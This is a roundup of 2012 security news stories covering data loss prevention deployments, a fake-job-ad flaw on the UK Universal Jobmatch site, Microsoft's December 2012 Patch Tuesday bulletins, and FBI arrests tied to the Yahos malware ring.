About a year and a half ago, Mark Jackson, the information security officer at San Rafael, Calif.-based Westamerica Bank, began researching data loss prevention products for the regional community bank. His search began after a Department of Financial Institutions auditor recommended the technology as a way for Westamerica Bank to manage insider threats.
|
UK job search website vulnerability allows unchecked job postings
Hackers have obtained personal details of more than 70 job applicants by exploiting a flaw in the U.K. government's Universal Jobmatch website. According to U.K. television station Channel 4 News, security checks are not performed on the people who post jobs, and job advertisements go unchecked as well.
A group of hackers seeking to draw attention to the security flaws used clearly false information to register as employers. They then posted a fake advertisement for a cleaning job to the site. Applicants for the job handed over highly sensitive personal details, including national insurance numbers, email addresses, dates of birth, personal addresses and scans of passports. Hackers who are able to collect these kinds of information could easily commit identity fraud, or illegally access applicants' email, bank accounts and other online accounts.
Channel 4 investigators were also able to register to the site within minutes. They have notified the U.K.'s privacy watchdog, the Information Commissioner's Office, of the problem.
User-generated content on forums and other websites has been a growing concern. Basic website security controls scan contributed user content for invalid URLs, malware and malicious script that can cause serious problems. Research issued in May by security firm Imperva highlighted the dangers of user-generated content. Many social media sites run PHP, a common Web development language that can make sites vulnerable to attack.
In a statement about the Jobmatch website, the U.K. Department of Work and Pensions said:
"The site clearly advises jobseekers not to give out personal details like bank accounts or National Insurance numbers until a job offer's been made. Anybody seeking to acquire personal data by publishing fake job adverts should be aware this is potentially an attempt to commit fraud and that is a criminal offence.
"The security of a claimant's data is of the utmost importance to us and we have a number of checks in place when employers register to use the site. Sadly, there will always be a small number of cases where people seek to get around these checks. If someone is being asked for personal information or details beyond their CV [curriculum vitae] we would recommend they alert Jobcentre Plus immediately."
The Universal Jobmatch website can be accessed via the U.K. government portal gov.uk. It was launched on Nov. 19 as a replacement for the Jobcentre Plus website, which Channel 4 News exposed as being vulnerable to fraudsters in 2011.
Internet Explorer vulnerabilities fixed in December 2012 Patch Tuesday
Microsoft released five critical security bulletins, fixing coding errors in Internet Explorer (IE) and Microsoft Word. The IE flaw is present in all iterations of the browser, however, they are not being exploited in the wild and for the version before IE 9, the update is a defense-in-depth change only.
The software giant's last scheduled round of updates for 2012 included seven bulletins in Microsoft's December 2012 Patch Tuesday, repairing a total of  12 vulnerabilities across its product set.
Patching experts say the IE vulnerabilities, addressed in MS12-077, should be some of the first that companies address. The security update is critical for IE 9 and 10, and has no severity rating for IE 6, 7 and 8. The most severe vulnerabilities could allow remote code execution. A successful attacker could gain the same rights as the current user. Paul Henry, security and forensic analyst at Lumension Security Inc., in Scottsdale, Ariz., said the popularity of IE makes this patch an important one for businesses.
MS12-079 is another critical bulletin that should be a high priority for businesses. This bulletin patches a vulnerability in Microsoft Word that could allow remote code execution if a user opens a specially crafted Rich Text Format (RTF) file using a flawed version of Microsoft Office software, or previews or opens a specially crafted RTF email message in Outlook while using Microsoft Word as the email viewer.
Amol Sarwate, director of vulnerability research at Redwood City, Calif.-based Qualys Inc., said Word vulnerabilities are usually only rated Important, however, Microsoft made it a critical update because Word is the default preview method for email attachments in Outlook.
MS12-079 affects Microsoft Word 2003, 2007 and 2010, and all supported versions of Microsoft Word Viewer, Microsoft Office Compatibility Pack, and Microsoft Office Web Apps. Â It may require a restart.
MS12-078 is a criti cal security bulletin that requires a restart. It fixes vulnerabilities in Windows Kernel-Mod Drivers that could allow remote code execution if a user opens a specially crafted document or visits a malicious webpage that embeds TrueType or OpenType font files. The vulnerabilities affect all supported releases of Microsoft Windows.
MS12-080 may require a restart to fix vulnerabilities in Microsoft Exchange Server 2007 and 2010, with the most extreme in Microsoft Exchange Server WebReady Document Viewing. Theses vulnerabilities could allow remote code execution if a user previews a specially crafted file using Outlook Web App. Businesses using Exchange should pay attention to this bulletin, said Wolfgang Kandek, CTO at Qualys.
The final critical bulletin is MS12-081, which addresses a vulnerability in Windows File Handling Component that could allow remote code execution. It requires a restart. The affected software are  Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
The two important bulletins, MS12-082 and MS12-083, require a restart. MS12-082 fixes a vulnerability in DirectPlay that could allow remote code execution. The vulnerability is present in all supported version of Microsoft Windows except Windows RT. MS12-083 fixes a vulnerability in IP-HTTPS that could allow security feature bypass. It impacts all supported editions of Windows Server 2008 R2 and Windows Server 2012.
Microsoft also released an update to Security Advisory 2755801, which fixes vulnerabilities in Adobe Flash Player in IE 10. The advisory is in conjunction with a critical update to Flash Player issued today by Adobe.Â
Microsoft bulletins decline in 2012
Microsoft said its last Patch Tuesday of 2012 marks a year with an overall decline in security bulletins, something Lumension's Henry attributes to Microsoft's secure coding initiative.
"Most of the upda tes [this year] have been with legacy code," Henry said.
There were 83 bulletins in 2012, 100 in 2011 and 106 in 2010. Henry also pointed out that the number of patches each month has evened out. This year, every month except September had 6-9 bulletins. In contrast, 2011 saw the totals go up and down on a monthly basis. This turn to greater consistency has helped IT teams better prepare for Patch Tuesday.
Lessons learned from real-world DLP technology deployments
Despite all of the security technologies -- compliance to government and industry regulations, and employee awareness training â€" it's impossible to save workers from themselves. As they access, use and share their data they often make mistakes that can cause serious data breaches. They'll email confidential files to their systems at home; they'll inadvertently save unencrypted, regulated data on the network somewhere; and they'll make tons of other mistakes every day that place confidential data at risk, or use it in ways that violates security policy.
DLP is just a tool; it just tells you where your areas of risk are.
Charles Lee,
regional information security officer, Providence Health & Services
Johnny Matamoros, information security manager at Freeman Decorating Co., based in Dallas Texas, knows these challenges. The IT team at Freeman Decorating took the right steps to better secure data. They separated their network into segments, including the portion that handled credit card data, and they provided ways for workers to encrypt email. But they didn't have an effective way to spot potential data leaks as they happened, Matamoros explained.
"We did not have an effective solution, or process in place, to consistently monitor, identify, alert and report on when specific data types enter or leave the organization. In our case, the [pressing] data type was credit card information," Matamoros said.
To quickly identify such incidents, Matamoros deployed McAfee Data Loss Prevention (DLP). But that deployment, while a success, wasn't without its own set of hurdles and lessons learned. And while many organizations that have deployed DLP technology report a certain amount of success in limiting data loss, it's not always easy getting to that point.
To gain an understanding of the most common lessons learned from real-world DLP installations, we've interviewed a number of experts who are either deeply familiar with the DLP market, or security managers who've successfully implemented DLP. Here's the advice they had to share:
Your own data governance maturity matters as much, if not more, than the technology. In fact, Rich Mogull, analyst and CEO at the Phoenix-based IT security market research firm Securosis, said the technology, which most often works as expected, isn't the number one inhibitor to successful DLP technology deployments: "If DLP implementations are going to work, you have to be mature as an organization about your data. Organizations have to have a good sense of where their data is and how to protect it. And starting from the beginning and identifying the data that is important to protect and where it resides is difficult, and it's a lot of work," Mogull said.
DLP technology deployments: Going too far, too fast
Another common theme among failed deployments is going too far, too fast with the data screened and controlled by DLP. "You'll run into a significant false-positive issue if you do so," said Scott Crawford, research director at Enterprise Management Associates.
"There are potential issues when it comes to how much data you are collecting, and how much of that data is relevant? And what is your false-positive hit-rate looking like? You need to plan to allocate resources to tune your deployment," Crawford explained.
"Initially, go for the quick wins. Take a high-level view of your environment by turning on a group of rules, but don't worry about enforcing those policies. You just use it as a way of finding, at a high level, where as much stuff is as you can. Consider it a risk assessment to find your biggest problem areas," Mogull said.
Crawford agreed with aiming for digestible, quick wins. "That will include data with a high structure and high recognizability. These will provide the easiest hits with the fewest false-positives," Crawford added. That typically means starting with account data that conforms to specific format such as account numbers, Social Security numbers, credit card data and similarly structured information. Where it starts to get a little fuzzy is in unstructured data, like intellectual property, that requires its own attention, and that is where classification becomes more important," Crawford said.
Failure to plan for ongoing system response and tuning
As you start looking for data, you need to be prepared to be potentially deluged with the amount of data, varying types of data, sources of data transmissions, as well as the content of the data itself, Matamoros explained. "[Preparing for] the content of the data is not to be taken lightly, as you never know what you may capture. In addition, you really should be clear on the type of data you want to monitor and the action you want performed when the data is seen by the DLP," he added. "Even with proper data types identified, be prepared to spend some time tuning for false positives based on your individual organization," Matamoros said.
DLP is a technological "solution." A few years ago, Renton, Washington-based hospital and health care services provider Providence Health & Services set out to ensure confidential data such as patient, employee and partner-sensitive information wasn't being transmitted insecurely, said Charles Lee, regional information security officer at Providence. But it's not just the ability to detect confidential data potentially leaking on the network that turns out to be the real, long-term win, Lee explained. "DLP is just a tool; it just tells you where your areas of risks are," he said. "The real win, in my opinion, is the opportunity it creates to bring awareness and training to your users," he added.
According to Lee, as Providence has steadily improved its DLP implementation, every time a user triggers a DLP event, it's a training opportunity. "They get coached and trained on proper ways of handling information. There are also opportunities to improve bad, unsecured business processes that are discovered," he said. "DLP is not a deploy-and-forget technology, it can actually provide opportunities to improve employee and business security workflow," he said.
Not running proof-of-concept deployment
To get started on the right foot, Freeman Decorating's Matamoros suggested starting with a manageable proof-of-concept.
"It's very important to get buy-in from management and agreement of not only which capture filters to enable, but also what actions to take and who to contact, should you see any filters triggered. In addition, you should properly identify a network location that will provide the data you are interested in monitoring," he said. "Once you begin monitoring, be prepared for the results. This could be overwhelming, initially," he said.
About the author:
George V. Hulme writes about security and technology from his home in Minneapolis. You can also find him tweeting about those topics on Twitter at @georgevhulme.
Social engineering, employee gaffes require full attention, says expert
Companies often rely too heavily on security technologies and ignore the impact a "human firewall," can have on security explains noted software security expert Hugh Thompson. In an interview with SearchSecurity.com, Thompson explains that social engineering attacks have made it extremely difficult for employees to weed out legitimate messages from those designed to trick users into giving up sensitive data.
FBI arrests attackers associated with Facebook cybercrime ring
The FBI has arrested 10 people in association with an international cybercrime ring suspected of spreading malware via Facebook, bilking more than $850 million from stolen bank account credentials and credit card data.
The arrests were aided with the assistance of the IT security team at Facebook, which tracked down the individuals and assisted people who were infected with malware. The cybercriminal gang uses the Butterfly Botnet to spread malware and is believed to have made most of its gains through Facebook.
The suspects are from Bosnia and Herzegovina, Croatia, Macedonia, New Zealand, Peru, the United Kingdom, and the United States. The FBI said the individuals ran the Yahos malicious software, which is linked to more than 11 million infections.
"Yahos targeted Facebook users from 2010 to October 2012, and security systems were able to detect affected accounts and provide tools to remove these threats," the FBI said in a statement.
Facebook, Twitter and other social networks have beefed up Web security in the face of a growing interest of cybercriminals targeting users. Experts say users have a high level of trust in the social networks, often clicking on shared links without considering the security ramifications.
Facebook was hit by the Ramnit worm in August, enabling attackers to steal user account passwords. The Koobface worm has also spread via the social network for a number of years. Facebook has partnered with McAfee to boost security and has implemented brute force password protection. It also monitors all user accounts for anomalous activity, suspending accounts that it suspects are fraudulent or taken control by attackers.